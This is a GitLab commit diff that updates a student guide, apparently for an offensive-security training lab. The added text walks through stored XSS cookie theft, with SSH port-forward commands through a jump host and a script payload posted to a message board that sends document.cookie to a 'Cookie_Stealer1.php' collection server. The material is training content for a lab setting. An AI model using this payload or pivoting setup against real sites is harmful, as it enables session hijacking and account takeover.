UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 66dcf866 authored by Bryan Gagne's avatar Bryan Gagne
Browse files

Merge branch 'temp-sg-branch' into 'master'

Student Guides Updated

See merge request !99
parents bd27a849 acfbc83f
1 merge request!99Student Guides Updated
Pipeline #121947 passed with stages
in 59 seconds
......@@ -487,6 +487,26 @@ fclose($steal);
. This can also be done by creating a listening port on "jmp/pivot" system (IE Lin_Priv system) and having the call back go to its internal IP on some random port.
----
If using Local Port Fordwards to access internal web server, keep in mind of your "Targets" routing capabilities. The IP you place in the "document.location"
needs to be accessible to the "Target". See example below.
ssh demo1@<DEMO_NET_FLOAT> -L 1111:10.208.50.42:80 # Gives Op Station access to internal Website via jmp system.
ssh demo1@<DEMO_NET_FLOAT> -L 2222:10.208.50.61:80 # Gives Op Station access to "Our Malicious Webserver" to capture the cookies.
. Utilize the message board hosted on the Demo-Web_Exploit_upload: `http://127.0.0.1:1111/chat/messageb.php`
. On the message board enter a name and then input the following javascript in the message field and submit.
<script>document.location="http://127.0.0.1:2222/Cookie_Stealer1.php?username=" + document.cookie;</script>
** Since your "Op Station" can not directly access the 10.208.50.61 system to send your cooking too, you would have to build a tunnel to make that connection.
From a operational standpoint, the target or targets of the Stored XSS need to be able to route to the system that is "collecting" the Cookies.
----
. To remove the stored XXS from sytem:
[,sql]
......
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment